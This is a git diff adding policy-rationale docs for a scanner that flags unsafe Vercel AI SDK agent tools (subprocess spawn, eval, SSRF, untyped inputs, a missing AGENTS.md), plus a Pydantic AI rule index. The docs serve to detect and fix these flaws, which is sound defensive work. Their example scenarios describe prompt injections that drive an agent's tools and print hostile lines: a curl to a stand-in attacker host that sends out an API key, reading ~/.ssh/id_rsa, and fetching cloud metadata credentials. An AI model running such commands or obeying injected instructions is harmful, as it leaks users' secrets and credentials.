lookupOrder, searchDocs }, // no bash/computer/codeExecution + stopWhen: stepCountIs(8), // bounded loop + // toolChoice defaults to "auto" — the model calls a tool only when needed + prompt, +}); +``` + +1. Drop provider shell / computer / code-execution tools unless the workflow + truly requires one. 
If essential, run it against an isolated, ephemeral + sandbox with no credentials, no private-network reach, and a hard timeout; + constrain which commands or code may run; and gate every invocation behind + explicit human approval. +2. Always set an explicit bound — `maxSteps` or a `stopWhen` condition + (`stepCountIs(n)`) — sized to the lowest the workflow tolerates so a + misbehaving loop fails fast. +3. Leave `toolChoice` at `"auto"` so the model calls an execution tool only when + the task needs it; pin to a specific *safe* tool when a call is genuinely + mandatory. +4. Treat prior tool output and retrieved content as untrusted — they are the + model-reachable surface a prompt injection rides in on. diff --git a/docs/Policy/vercel_ai/code_execution.md b/docs/Policy/vercel_ai/code_execution.md new file mode 100644 index 0000000..c5fcb49 --- /dev/null +++ b/docs/Policy/vercel_ai/code_execution.md @@ -0,0 +1,135 @@ +--- +policy_id: vercel_ai_code_execution +category: vercel_ai +topic: code_execution +rules: + - id: VAI-002 + severity: high + confidence: 0.9 + scope: tool + fix_type: code +references: [LLM06] +--- + +# Policy Rationale: Vercel AI SDK Code-Execution Safety + +**Policy ID:** `vercel_ai_code_execution` +**File:** `vercel_ai/code_execution.yaml` +**Rules:** VAI-002 +**Severities:** high +**Fix types:** code +**References:** LLM06 (Excessive Agency) + +--- + +## What this policy covers + +Vercel AI SDK tools whose `execute()` body evaluates code. **VAI-002** fires on +the `has_code_exec_call` fact, which discovery sets for a tool handler that calls +the bare `eval(...)` global or constructs `new Function(...)`. The match keys on +those two AST shapes only — a `call_expression` whose callee text is exactly +`eval`, and a `new_expression` whose constructor identifier is exactly +`Function` — so a method named `obj.eval(...)` or an identifier that merely +contains "eval" does not fire. 
+ +--- + +## Why dynamic code execution is a distinct concern in Vercel AI tools + +A Vercel AI tool is model-callable through the agent's `tools` record, so a string +the model emits as an argument can reach the tool's `execute()` and become +executing JavaScript. `eval` and `new Function` compile that string in the agent's +own Node process — and this is *strictly more dangerous than a shell-out*, because +there is not even a separate process boundary to constrain it. The evaluated code +runs with the full Node runtime in scope: `process.env` for secrets, +`require('child_process')` to spawn commands, `require('fs')` to read or write any +file the process can touch. A single prompt injection that lands in the evaluated +string is arbitrary code execution with no sandbox between the model and the host +(LLM06). + +`new Function` deserves a specific note: it always closes over the global scope, so +unlike some interpreted languages there is no partial mitigation — no built-in way +to strip globals from the constructed function. The only reliable defense is not +feeding model output to a code evaluator at all. + +--- + +## Rule-by-rule defense + +### VAI-002 — Tool execute() evaluates code (eval / new Function) (Severity: high, Confidence: 0.9, Fix type: code) + +**What we detect:** a Vercel AI tool whose `execute()` handler calls the bare +`eval(...)` global or constructs `new Function(...)` (the structural +`has_code_exec_call` fact, exact-callee match). + +**Why it is flaggable:** `eval` / `new Function` turn a model-supplied string into +executing JavaScript in the agent process, with no sandbox between the call and the +Node runtime's modules, file handles, and environment. + +**Real-world consequence:** a `calculate(expr)` tool implemented as +`return eval(expr)` is driven by an injected instruction into +`require('child_process').execSync('curl attacker/'+process.env.API_KEY)` — +arbitrary command execution and credential theft from one evaluated string. 
+ +**Why severity is high and not critical:** there is no in-band sandbox and not +even a partial globals-stripping mitigation, so the gap is not partially mitigable; +it is held at high (matching the Python `eval` siblings) rather than critical +because the engine reserves that tier for unconditional code execution, and the +exposure here depends on whether the evaluated string is actually +model-influenced. **Fix type — code:** removing +`eval` / `new Function` is an edit to the tool's own source. **Confidence 0.9:** +the exact-callee fact eliminates the two dominant false positives by construction +— a same-named method (`x.eval(...)`) and an unrelated identifier do not match — +so confidence is high; the residual gap is the false negatives listed below. + +--- + +## What this policy does not cover + +- `eval` reached through an alias (`const e = eval; e(s)`) or a property access + (`globalThis.eval`, `window.eval`) — the exact-callee match misses it. +- The `vm` module (`vm.runInNewContext`, `vm.runInThisContext`, + `new vm.Script(...)`), dynamic `import()` of an attacker-named module, and the + string form of `setTimeout("...", 0)` — none are in the matched set. +- A code-exec call in a helper in another module — discovery sees the tool + handler, so a wrapper defined elsewhere escapes the fact. +- Evaluations whose argument is provably a constant literal still fire — the fact + flags the presence of the primitive, not proof of model-control. +- TypeScript only: a tool defined in plain `.js` may not be analyzed with the same + fidelity as a typed `.ts`/`.tsx` handler, so a `.js` `execute()` body can be a + coverage gap. 
+ +--- + +## Recommendations beyond the fix + +```typescript +import { tool } from "ai"; +import { z } from "zod"; +import { Parser } from "expr-eval"; // a constrained expression parser + +const safeParser = new Parser(); // evaluates math, runs no code + +export const calculate = tool({ + description: "Evaluate a constant arithmetic expression and return the result.", + inputSchema: z.object({ expr: z.string() }), + execute: async ({ expr }) => { + try { + return { result: safeParser.evaluate(expr) }; // no eval / new Function + } catch { + return { error: "not a valid expression" }; + } + }, +}); +``` + +1. Remove `eval` / `new Function` from tool handlers. If the tool must interpret a + model-provided expression, parse it with a real parser into a constrained AST + you evaluate yourself. +2. If running code is genuinely the product, hand it to an isolated sandbox (a + separate process or a hardened runner with no filesystem, network, or + credentials) gated behind an explicit allow-list — never the in-process + evaluator. +3. Keep secrets out of `process.env` of any process that hosts an evaluation + tool, and never run such a tool with ambient cloud credentials. +4. Validate the tool's input with a typed `inputSchema` (see VAI-005) so the + handler receives a checked shape, not raw `unknown`. 
diff --git a/docs/Policy/vercel_ai/repo_hygiene.md b/docs/Policy/vercel_ai/repo_hygiene.md new file mode 100644 index 0000000..ac107bd --- /dev/null +++ b/docs/Policy/vercel_ai/repo_hygiene.md @@ -0,0 +1,119 @@ +--- +policy_id: vercel_ai_repo_hygiene +category: vercel_ai +topic: repo_hygiene +rules: + - id: VAI-012 + severity: low + confidence: 0.9 + scope: repo + fix_type: config +references: [LLM06] +--- + +# Policy Rationale: Vercel AI SDK Repo Hygiene + +**Policy ID:** `vercel_ai_repo_hygiene` +**File:** `vercel_ai/repo_hygiene.yaml` +**Rules:** VAI-012 +**Severities:** low +**Fix types:** config +**References:** LLM06 (Excessive Agency) + +--- + +## What this policy covers + +A single repo-scope rule that fires once per scan. **VAI-012** fires when the repo +uses the Vercel AI SDK in code (predicate `repo_has_sdk_in_code` for `vercel_ai`) +but ships no agent-guidance doc — neither `AGENTS.md` nor `CLAUDE.md` is present as +a discovered repo component (predicate `repo_component_present`, negated). It reads +the scan inventory, not any single file. + +--- + +## Why a missing agent-guidance doc is a distinct concern for Vercel AI projects + +`AGENTS.md` is the cross-vendor convention an editing coding agent reads before it +acts on a repository. When neither it nor a `CLAUDE.md` is present, any agent that +opens this repo has no project-specific guidance on how its tools and agents must +be configured. For a Vercel AI project specifically, that means nothing in-tree +tells the agent whether provider execution tools (anthropic `bash`/`computer`, +openai `localShell`/`codeInterpreter`, google `codeExecution`) are permitted, how +tools must be typed and guarded, whether `maxSteps`/`stopWhen` is required, and +what the local test and build commands are. The likely consequence is generated +code that violates the project's own safety contract — an agent wiring +`anthropic.tools.bash` or an untyped `dynamicTool` because nothing taught it the +local rules. 
This is a soft, preventive form of excessive-agency risk (LLM06): the +guardrail that should constrain an editing agent's choices is absent, so the agent +operates with more latitude than the maintainers intend. + +--- + +## Rule-by-rule defense + +### VAI-012 — Project ships no agent-guidance doc (Severity: low, Confidence: 0.9, Fix type: config) + +**What we detect:** a repo that uses the Vercel AI SDK in code but has neither +`AGENTS.md` nor `CLAUDE.md` at the root (predicates `repo_has_sdk_in_code` + `not +repo_component_present`). + +**Why it is flaggable:** without an in-tree guidance doc, an editing agent has no +project-specific rules to follow and will reproduce unsafe patterns the +maintainers would reject. + +**Real-world consequence:** a developer asks a coding agent to "add a tool that +runs shell commands"; with no `AGENTS.md` stating provider execution tools are +forbidden, the agent wires `anthropic.tools.bash` into the loop — exactly the +pattern VAI-006 flags. + +**Why severity is low and not medium:** the absence of the doc causes no harm by +itself; it only raises the probability that *other* defects get introduced, so it +is a preventive nudge rather than a live vulnerability. **Fix type — config:** the +fix is adding a documentation file at the repo root — no application or tool code +changes. **Confidence 0.9:** presence of `AGENTS.md` / `CLAUDE.md` is an +unambiguous inventory check; the small gap covers projects that document agent +guidance somewhere the component scan does not recognize. + +--- + +## What this policy does not cover + +- The *content* or *quality* of an `AGENTS.md`. An empty or stale file satisfies + the rule; the rule checks presence, not whether the guidance is correct or + followed. +- Guidance kept somewhere other than a root `AGENTS.md` / `CLAUDE.md` — a wiki, a + `CONTRIBUTING.md`, or a nested per-package doc — counts as absent. +- Whether any agent actually reads the doc. 
The rule cannot verify that an editing + agent honors the guidance. +- It is a repo-scope nudge, not a per-agent or per-tool check — it says nothing + about the safety of any individual agent or tool in the repo. + +--- + +## Recommendations beyond the fix + +```markdown + +# Agent guidance + +## Safety rules +- Provider execution tools (anthropic bash/computer/codeExecution, openai + localShell/codeInterpreter, google codeExecution) are **forbidden**. +- Every `generateText`/`streamText` call sets `maxSteps` or `stopWhen`. +- Every tool has a `description` and a concrete Zod `inputSchema` — no + `dynamicTool` or `z.any()` without in-handler validation. +- Tools must not shell out or `fetch` model-supplied URLs without the net guard. + +## Commands +- Test: `pnpm test` +- Lint: `pnpm lint` +- Build: `pnpm build` +``` + +1. Add an `AGENTS.md` at the repo root (a `CLAUDE.md` also satisfies the rule). +2. State whether provider execution tools are permitted and under what guard, how + tools must be typed and constrained, and any required human-in-the-loop gates. +3. List the exact test, lint, and build commands so an editing agent can verify + its own changes. +4. Keep it short and concrete, and keep it current as the safety contract evolves. 
diff --git a/docs/Policy/vercel_ai/shell_safety.md b/docs/Policy/vercel_ai/shell_safety.md new file mode 100644 index 0000000..85743f5 --- /dev/null +++ b/docs/Policy/vercel_ai/shell_safety.md @@ -0,0 +1,131 @@ +--- +policy_id: vercel_ai_shell_safety +category: vercel_ai +topic: shell_safety +rules: + - id: VAI-001 + severity: high + confidence: 0.85 + scope: tool + fix_type: code +references: [LLM06] +--- + +# Policy Rationale: Vercel AI SDK Shell-Execution Safety + +**Policy ID:** `vercel_ai_shell_safety` +**File:** `vercel_ai/shell_safety.yaml` +**Rules:** VAI-001 +**Severities:** high +**Fix types:** code +**References:** LLM06 (Excessive Agency) + +--- + +## What this policy covers + +Vercel AI SDK tools whose `execute()` body spawns an OS process. **VAI-001** fires +on the `has_shell_call` fact, which discovery sets when a tool handler calls a Node +`child_process` primitive — `exec`, `execSync`, `spawn`, `spawnSync`, `execFile`, +or `fork`. The fact is set on both the bare and `child_process.`-qualified callee +forms. + +--- + +## Why shell execution is a distinct concern in Vercel AI tools + +A Vercel AI tool is exposed to the model via the agent's `tools` record, so the +model writes or selects the command string the handler runs. Shell execution +selected by model output is the most direct path from prompt injection to remote +code execution: the spawned process inherits the agent process's working +directory, environment variables (including API keys), filesystem credentials, and +outbound network. A single injected instruction that reaches `exec`/`execSync` runs +with the agent's full privileges. + +The Vercel-specific sharpening is that the `ai` core package ships *no* built-in +shell-tool primitive. Unlike frameworks with a first-class shell tool, a Vercel AI +project's only shell surface is a hand-rolled `execute()` that spawns a subprocess +— and it hides inside an ordinary-looking tool definition. 
That makes the +hand-rolled `child_process.exec(cmd)` the exact shape a reviewer must hunt for, +because nothing else in the SDK will surface it. + +--- + +## Rule-by-rule defense + +### VAI-001 — Tool execute() spawns a subprocess (Severity: high, Confidence: 0.85, Fix type: code) + +**What we detect:** a Vercel AI tool whose `execute()` handler invokes a +`child_process` primitive (`exec`, `execSync`, `spawn`, `spawnSync`, `execFile`, +`fork`) — the `has_shell_call` fact, set on the bare and qualified callee forms. + +**Why it is flaggable:** process spawn from a model-callable handler puts the OS +shell on the model's tool surface. The presence of the spawn is the signal; every +safeguard is bolted onto an inherently broad primitive. + +**Real-world consequence:** a `run(cmd)` tool forwarding a model string into +`exec(cmd)` is one prompt injection from arbitrary command execution — an injected +`cmd="cat ~/.ssh/id_rsa"` leaks the private key into the model context. + +**Why severity is high and not critical:** the fix usually means removing the +spawn or rearchitecting behind a typed API; it is not raised above high because +the exposure depends on what the handler does with the spawn, and the engine +reserves critical for unconditional RCE. **Fix type — code:** replacing the spawn +(or fronting it with an allow-list) is a tool-source edit. **Confidence 0.85:** +the fact is set on the recognized `child_process` callees, so a spawn hidden +behind a helper in another module escapes it, and a spawn through a less common +primitive outside the recognized set is a false negative. + +--- + +## What this policy does not cover + +- A spawn wrapped behind a helper defined in another module — discovery sees the + tool handler, so a wrapper elsewhere escapes the fact. +- Spawn primitives outside the recognized `child_process` set, or reached through + an aliased import (`import { exec as run } from "child_process"` used through a + further indirection). 
+- Whether the spawned command is safe. A literal `execFile("ls", ["/tmp"])` fires + even though it is comparatively benign — the fact flags the presence of the + primitive, not proof of model-control. +- TypeScript only: a tool defined in plain `.js` may not be analyzed with the same + fidelity as a typed `.ts` handler, so a `.js` `execute()` spawn can be a + coverage gap. +- File-system writes and network exfiltration through non-subprocess primitives + belong to other policies. + +--- + +## Recommendations beyond the fix + +```typescript +import { tool } from "ai"; +import { z } from "zod"; +import { execFile } from "node:child_process"; +import { promisify } from "node:util"; + +const run = promisify(execFile); + +export const gitLog = tool({ + description: "Return the last N git commits for the repo.", + inputSchema: z.object({ count: z.number().int().min(1).max(50) }), + execute: async ({ count }) => { + // Fixed binary + argv array; no shell string, no model-supplied command. + const { stdout } = await run("git", ["log", "-n", String(count), "--oneline"], { + timeout: 10_000, + }); + return { log: stdout }; + }, +}); +``` + +1. Replace shell-outs with a typed library call where one exists. If a subprocess + is unavoidable, use `execFile`/`spawn` with a fixed binary and an argument + array — never a shell string and never `exec(model_string)`. +2. Allow-list the exact commands permitted, and always pass a `timeout` option — a model + can request an infinitely-running command. +3. Run the agent in a sandbox with dropped capabilities and a network egress + allow-list; pass a minimal `env` to the child rather than inheriting the + process environment. +4. Keep shell logic out of any model-callable tool, and log every spawned command + with the session ID for audit.
diff --git a/docs/Policy/vercel_ai/ssrf.md b/docs/Policy/vercel_ai/ssrf.md new file mode 100644 index 0000000..68a0402 --- /dev/null +++ b/docs/Policy/vercel_ai/ssrf.md @@ -0,0 +1,138 @@ +--- +policy_id: vercel_ai_ssrf +category: vercel_ai +topic: ssrf +rules: + - id: VAI-003 + severity: high + confidence: 0.75 + scope: tool + fix_type: code +references: [LLM06] +--- + +# Policy Rationale: Vercel AI SDK Server-Side Request Forgery + +**Policy ID:** `vercel_ai_ssrf` +**File:** `vercel_ai/ssrf.yaml` +**Rules:** VAI-003 +**Severities:** high +**Fix types:** code +**References:** LLM06 (Excessive Agency) + +--- + +## What this policy covers + +Vercel AI SDK tools whose `execute()` body fetches a URL the model controls. +**VAI-003** fires on the `has_dynamic_url_call` fact: a handler that issues an +outbound HTTP call (`fetch`, `axios`, `got`, `undici`) whose URL argument is not a +constant — it comes from the tool's arguments, a template string, or a +concatenation. A call to a hard-coded constant URL does not fire. + +--- + +## Why SSRF is a distinct concern in Vercel AI tools + +When the request URL is a literal, the developer chose the destination. When it is +built from a tool argument or a template, the *model* chooses the destination at +call time — and in a Vercel AI agent the model's choices are reachable by prompt +injection. A server-side request originates from inside the agent's network, so it +can reach what an external caller cannot: internal services on private CIDRs, +localhost admin ports, and the cloud metadata endpoint (169.254.169.254) that +hands out short-lived IAM credentials. A single injected instruction that +redirects the fetch to the metadata endpoint exfiltrates those credentials through +the model's next output. + +There is a second-order hazard specific to agents: the fetched body re-enters the +conversation as text the model reads, so an attacker who controls the fetched page +controls a fresh prompt-injection channel into the agent. 
The SSRF primitive is +both an outbound credential-theft path and an inbound injection path at once — +excessive agency (LLM06) even when the developer never intended the tool to reach +internal hosts. + +--- + +## Rule-by-rule defense + +### VAI-003 — Tool execute() fetches a model-controlled URL (Severity: high, Confidence: 0.75, Fix type: code) + +**What we detect:** a Vercel AI tool handler that issues an outbound HTTP call +(`fetch`/`axios`/`got`/`undici`) whose URL is non-literal — from an argument, a +template, or a concatenation (the `has_dynamic_url_call` fact). + +**Why it is flaggable:** a model-controlled request target lets a prompt injection +point the request at internal services or the metadata endpoint, and feeds the +response back into the conversation as untrusted text. + +**Real-world consequence:** a `fetchUrl({ url })` tool calling `fetch(url)` is +injected with +`url="http://169.254.169.254/latest/meta-data/iam/security-credentials/role"`; the +returned credentials are exfiltrated through the model's next reply. + +**Why severity is high and not critical:** SSRF is serious but its blast radius +depends on the host's network position (a host with no reachable internal services +or metadata endpoint gets far less); it is not the unconditional code execution +the engine reserves critical for. **Fix type — code:** constraining or hard-coding +the destination is an edit to the handler. **Confidence 0.75:** `fetch` is also +the everyday way to call a legitimate external API, so a non-literal URL is a +weaker signal of *intent* here than a shell or eval call — the rule over-fires on +tools that fetch a dynamic-but-vetted endpoint and under-fires when the URL is +assembled in a helper in another module, which is why confidence sits below the +shell/eval rules. 
+ +--- + +## What this policy does not cover + +- A request whose URL is dynamic but already validated against an allow-list + inside the handler — the fact cannot see the guard, so it fires anyway (a known + false positive, and the main reason confidence is 0.75). +- A fetch assembled in a helper in another module — discovery sees the handler, so + a wrapper elsewhere escapes the fact. +- DNS-rebinding and time-of-check/time-of-use attacks against an allow-list that + validates the hostname but not the resolved IP — Node's `fetch` does not let you + pin the resolved address without a custom agent/dispatcher. +- TypeScript only: a tool defined in plain `.js` may not be analyzed with the same + fidelity as a typed `.ts` handler, so a `.js` `execute()` fetch can be a coverage + gap. +- Exfiltration or internal access through non-HTTP primitives (raw sockets, DNS) + belongs to other concerns. + +--- + +## Recommendations beyond the fix + +```typescript +import { tool } from "ai"; +import { z } from "zod"; +import { lookup } from "node:dns/promises"; +import ipaddr from "ipaddr.js"; + +const ALLOWED = new Set(["api.example.com"]); + +export const getStatus = tool({ + description: "Fetch a status path from the vetted API host only.", + inputSchema: z.object({ path: z.string() }), + execute: async ({ path }) => { + const url = new URL(`/${path.replace(/^\/+/, "")}`, "https://api.example.com"); + if (!ALLOWED.has(url.hostname)) return { error: "host not allowed" }; + const { address } = await lookup(url.hostname); + const range = ipaddr.parse(address).range(); + if (range !== "unicast") return { error: "resolves to a non-public address" }; + const res = await fetch(url, { redirect: "error", signal: AbortSignal.timeout(10_000) }); + return { body: await res.text() }; + }, +}); +``` + +1. If the tool only ever talks to one service, hard-code the base URL with `new + URL(path, BASE)` and accept only a path or query from the model — never a full + URL. +2. 
When a host must be dynamic, validate it against an allow-list, resolve the + hostname, and re-check the resolved IP against private / loopback / link-local + ranges; that narrows DNS rebinding, but only pinning the resolved IP closes it. +3. Set `redirect: "error"` (or validate each hop) so a 302 cannot bounce the + request into an internal address, and always set an `AbortSignal.timeout(...)`. +4. Treat the fetched body as untrusted — keep it out of the system prompt and do + not let it expand the agent's permissions. diff --git a/docs/Policy/vercel_ai/tool_definition.md b/docs/Policy/vercel_ai/tool_definition.md new file mode 100644 index 0000000..f1d10d7 --- /dev/null +++ b/docs/Policy/vercel_ai/tool_definition.md @@ -0,0 +1,162 @@ +--- +policy_id: vercel_ai_tool_definition +category: vercel_ai +topic: tool_definition +rules: + - id: VAI-004 + severity: low + confidence: 0.9 + scope: tool + fix_type: code + - id: VAI-005 + severity: medium + confidence: 0.8 + scope: tool + fix_type: code +references: [LLM06] +--- + +# Policy Rationale: Vercel AI SDK Tool Definition Hygiene + +**Policy ID:** `vercel_ai_tool_definition` +**File:** `vercel_ai/tool_definition.yaml` +**Rules:** VAI-004, VAI-005 +**Severities:** low, medium +**Fix types:** code, code +**References:** LLM06 (Excessive Agency) + +--- + +## What this policy covers + +Authoring hygiene for Vercel AI SDK tools built with `tool({...})` / +`dynamicTool({...})` from the `ai` package. **VAI-004** fires when the tool has no +`description` (predicate `has_docstring: false` over the description field). +**VAI-005** fires when the tool takes input but imposes no field types — it uses +`dynamicTool` (whose input is always `unknown`) or an open schema (`z.any()`, +`z.unknown()`, or an empty `z.object({})`) — predicates `has_params: true` AND +`has_typed_params: false`. The `description` is the only model-visible account of +the tool (the SDK has no docstring fallback), and the `inputSchema` is what the SDK +turns into the model's argument schema.
+ +--- + +## Why definition quality is a distinct concern in the Vercel AI SDK + +The model selects which tool to call and what arguments to pass entirely from the +`description` and the `inputSchema` — it never sees the `execute()` implementation. +The Vercel AI SDK is stricter than Python frameworks here: there is **no docstring +fallback**, so a tool defined with no `description` (or an empty one) reaches the +model as a bare name with zero account of what it does. The model then skips the +tool or calls it blindly. Likewise, the SDK builds the argument schema from +`inputSchema`; a `dynamicTool` (input `unknown`) or an open schema gives the model +no field-shape guidance, so it emits wrongly-shaped arguments that the SDK rejects +at validation time — or, worse, forwards unchecked into `execute()`. + +That last clause is why this policy references LLM06 rather than only the +output-handling concern: an untyped `inputSchema` does not merely cost reliability, +it widens the tool's input surface. If `execute()` consumes an `unknown` argument +without validating it, a model (or an injection) can pass a value the handler never +anticipated — a path, a URL, a command fragment — directly into the tool's logic. +Typing the input is the first guard that keeps a model-callable tool from being +fed arbitrary shapes. + +--- + +## Rule-by-rule defense + +### VAI-004 — Tool has no description (Severity: low, Confidence: 0.9, Fix type: code) + +**What we detect:** a `tool({...})` / `dynamicTool({...})` with no `description` +(or an empty one) — predicate `has_docstring` over the description field. + +**Why it is flaggable:** the SDK passes `description` to the model verbatim and has +no docstring fallback; with none, the tool is a bare name the model cannot reason +about. 
+ +**Real-world consequence:** a `lookup` tool with no description is never selected +when the user asks a question it could answer, or is called with a nonsense +argument because the model is guessing at its purpose. + +**Why severity is low and not medium:** it is a routing-quality defect with no +direct security impact, and the failure mode (a skipped or mis-called tool) is +visible and recoverable. **Fix type — code:** adding a `description` to the +`tool({...})` options is a tool-source edit. **Confidence 0.9:** presence of a +`description` is unambiguous; the small gap covers a description supplied through +an unusual indirection the predicate does not model. + +### VAI-005 — Tool accepts untyped input (Severity: medium, Confidence: 0.8, Fix type: code) + +**What we detect:** a tool that takes input but imposes no field types — a +`dynamicTool` (input `unknown`) or an open schema (`z.any()`, `z.unknown()`, empty +`z.object({})`) — predicates `has_params` + `not has_typed_params`. + +**Why it is flaggable:** the SDK builds the model's argument schema from +`inputSchema`; an open schema gives no shape guidance, so the model emits +wrongly-typed arguments that fail validation or flow unchecked into `execute()`. + +**Real-world consequence:** a `transferFunds` tool with `inputSchema: +z.object({})` (or `dynamicTool`) lets the model pass `{ amount: "all", to: +"../admin" }`; with no field types the SDK forwards it unchecked and the handler +acts on a shape it never validated. + +**Why severity is medium and not low:** an untyped input is not just a reliability +tax — it widens the tool's attack surface, since unvalidated model-supplied values +reach `execute()` directly; that potential for a wrong-shaped value to cause a real +action lifts it above the description rule. **Fix type — code:** giving the tool a +concrete Zod object schema is a source edit. 
**Confidence 0.8:** the rule fires on +the open-schema shapes, so a `dynamicTool` that genuinely cannot be typed and +validates inside `execute()` is over-flagged, and a schema that is typed but still +loose (`z.record(z.string(), z.any())`) may slip through as a false negative. + +--- + +## What this policy does not cover + +- The *quality* of a `description` or a schema: a one-word description or a + `z.record(z.string(), z.any())` satisfies the rules but barely constrains the + model. +- Whether `execute()` actually validates an `unknown` input from a `dynamicTool`. + A `dynamicTool` that validates internally still fires (a deliberate false + positive) — the rule cannot see the in-handler guard. +- Tool *naming*: a Vercel tool is keyed by its property name in the agent's `tools` + record rather than a function name, so name-based heuristics (e.g. the mutation- + prefix idempotency check that exists for Python SDKs) do not apply here — Vercel + ships no name-based rule, which is a deliberate coverage gap. +- TypeScript only: a tool defined in plain `.js` may not be analyzed with the same + fidelity as a typed `.ts` definition. +- Whether the schema matches the tool's real behavior — a misleading-but-present + description and a plausible-but-wrong schema both pass. + +--- + +## Recommendations beyond the fix + +```typescript +import { tool } from "ai"; +import { z } from "zod"; + +export const transferFunds = tool({ + description: + "Transfer an integer amount of cents from the user's account to a payee ID. " + + "Amounts are in cents; the payee must be an existing saved payee.", + inputSchema: z.object({ + amountCents: z.number().int().positive(), + payeeId: z.string().regex(/^payee_[a-z0-9]+$/), + }), + execute: async ({ amountCents, payeeId }) => { + // arguments arrive already validated against the schema + ... + }, +}); +``` + +1. Give every tool a `description` written for the model — there is no docstring + fallback — stating what it does, its inputs, and its return value.
+2. Give the tool a concrete Zod object schema in `inputSchema` with a typed field + per argument; constrain values with `.int()`, `.positive()`, `.regex(...)`, or + `z.enum([...])` rather than a bare `z.number()` / `z.string()`. +3. Reserve `dynamicTool` for the rare case where the input genuinely cannot be + typed, and even then validate the shape inside `execute()` before using it. +4. Keep the description and the schema in sync with the handler's real behavior — + an overstated description is its own correctness hazard. diff --git a/pydantic_ai/POLICY_INDEX.md b/pydantic_ai/POLICY_INDEX.md new file mode 100644 index 0000000..c277525 --- /dev/null +++ b/pydantic_ai/POLICY_INDEX.md @@ -0,0 +1,21 @@ + +# Pydantic AI policy index + +12 rules — 7 tool · 4 agent · 1 repo + +Risk score = `severity_weight × confidence × 100` (engine formula; weights: low=0.15, medium=0.40, high=0.70). Higher = worse. + +| | Id | SDK/ADK | Scope | Applies To | Policy | Severity | Confidence | Risk | Source | +| -- | ------- | ----------- | ----- | ----------------- | --------------------------------------------------------------------- | -------- | ---------- | ---- | ------------------------------------------------------------------------------------------------------------- | +| 1 | PYD-001 | Pydantic AI | tool | pydantic_ai_tool | Pydantic AI tool has no description | low | 0.90 | 13.5 | [tool_definition.yaml](https://github.com/trustabl/trustabl-rules/blob/main/pydantic_ai/tool_definition.yaml) | +| 2 | PYD-002 | Pydantic AI | tool | pydantic_ai_tool | Pydantic AI tool parameters are not type-annotated | medium | 0.85 | 34.0 | [tool_definition.yaml](https://github.com/trustabl/trustabl-rules/blob/main/pydantic_ai/tool_definition.yaml) | +| 3 | PYD-003 | Pydantic AI | tool | pydantic_ai_tool | Pydantic AI tool body spawns a subprocess | high | 0.85 | 59.5 | [shell_safety.yaml](https://github.com/trustabl/trustabl-rules/blob/main/pydantic_ai/shell_safety.yaml) | +| 4 | PYD-004 | Pydantic AI | tool |
pydantic_ai_tool | Pydantic AI tool body evaluates dynamic code | high | 0.85 | 59.5 | [code_execution.yaml](https://github.com/trustabl/trustabl-rules/blob/main/pydantic_ai/code_execution.yaml) | +| 5 | PYD-005 | Pydantic AI | tool | pydantic_ai_tool | Pydantic AI tool fetches a caller-controlled URL (SSRF) | high | 0.80 | 56.0 | [ssrf.yaml](https://github.com/trustabl/trustabl-rules/blob/main/pydantic_ai/ssrf.yaml) | +| 6 | PYD-006 | Pydantic AI | tool | pydantic_ai_tool | Pydantic AI tool network call has no timeout | high | 0.85 | 59.5 | [network.yaml](https://github.com/trustabl/trustabl-rules/blob/main/pydantic_ai/network.yaml) | +| 7 | PYD-007 | Pydantic AI | tool | pydantic_ai_tool | Mutating Pydantic AI tool has no idempotency key | medium | 0.55 | 22.0 | [idempotency.yaml](https://github.com/trustabl/trustabl-rules/blob/main/pydantic_ai/idempotency.yaml) | +| 8 | PYD-101 | Pydantic AI | agent | pydantic_ai_agent | Pydantic AI agent has no structured output validation | low | 0.70 | 10.5 | [agent_safety.yaml](https://github.com/trustabl/trustabl-rules/blob/main/pydantic_ai/agent_safety.yaml) | +| 9 | PYD-102 | Pydantic AI | agent | pydantic_ai_agent | Pydantic AI agent wires the code-execution native tool | high | 0.85 | 59.5 | [agent_safety.yaml](https://github.com/trustabl/trustabl-rules/blob/main/pydantic_ai/agent_safety.yaml) | +| 10 | PYD-103 | Pydantic AI | agent | pydantic_ai_agent | Pydantic AI agent wires a model-driven URL-fetching native tool | medium | 0.75 | 30.0 | [agent_safety.yaml](https://github.com/trustabl/trustabl-rules/blob/main/pydantic_ai/agent_safety.yaml) | +| 11 | PYD-105 | Pydantic AI | agent | pydantic_ai_agent | Pydantic AI agent retries with the exhaustive end strategy | low | 0.70 | 10.5 | [agent_safety.yaml](https://github.com/trustabl/trustabl-rules/blob/main/pydantic_ai/agent_safety.yaml) | +| 12 | PYD-201 | Pydantic AI | repo | pydantic_ai | Pydantic AI project ships no agent-guidance doc (AGENTS.md/CLAUDE.md) | low | 
0.90 | 13.5 | [repo_hygiene.yaml](https://github.com/trustabl/trustabl-rules/blob/main/pydantic_ai/repo_hygiene.yaml) | diff --git a/tools/gen_index.py b/tools/gen_index.py index c6becaf..51941aa 100644 --- a/tools/gen_index.py +++ b/tools/gen_index.py @@ -32,14 +32,18 @@ GH_BASE = "https://github.com/trustabl/trustabl-rules/blob/main/" GENERATED_MARKER = "" -SDK_ORDER = ["claude_sdk", "openai_sdk", "google_adk", "mcp", "langchain"] -SDK_LABEL = {"claude_sdk": "Claude SDK", "openai_sdk": "OpenAI SDK", "google_adk": "Google ADK", "mcp": "MCP", "langchain": "LangChain"} +SDK_ORDER = ["claude_sdk", "openai_sdk", "google_adk", "mcp", "langchain", "crewai", "autogen", "vercel_ai", "pydantic_ai"] +SDK_LABEL = {"claude_sdk": "Claude SDK", "openai_sdk": "OpenAI SDK", "google_adk": "Google ADK", "mcp": "MCP", "langchain": "LangChain", "crewai": "CrewAI", "autogen": "AutoGen", "vercel_ai": "Vercel AI", "pydantic_ai": "Pydantic AI"} SDK_FULL = { "claude_sdk": "Claude Agent SDK", "openai_sdk": "OpenAI Agents SDK", "google_adk": "Google ADK", "mcp": "Model Context Protocol", "langchain": "LangChain / LangGraph", + "crewai": "CrewAI", + "autogen": "AutoGen / AG2", + "vercel_ai": "Vercel AI SDK", + "pydantic_ai": "Pydantic AI", } SCOPE_ORDER = ["tool", "agent", "subagent", "repo"] @@ -60,8 +64,9 @@ All shipped rules across every SDK. ID prefix denotes the rule family: `CSDK-` Claude Agent SDK, `OAI-` OpenAI Agents SDK, `ADK-` Google ADK, -`MCP-` Model Context Protocol. Within a family: `NNN` tool-scope, `1NN` -agent / subagent scope, `2NN` repo scope. +`MCP-` Model Context Protocol, `LC-` LangChain / LangGraph, `CREW-` CrewAI, +`AG2-` AutoGen / AG2, `VAI-` Vercel AI SDK, `PYD-` Pydantic AI. Within a +family: `NNN` tool-scope, `1NN` agent / subagent scope, `2NN` repo scope. 
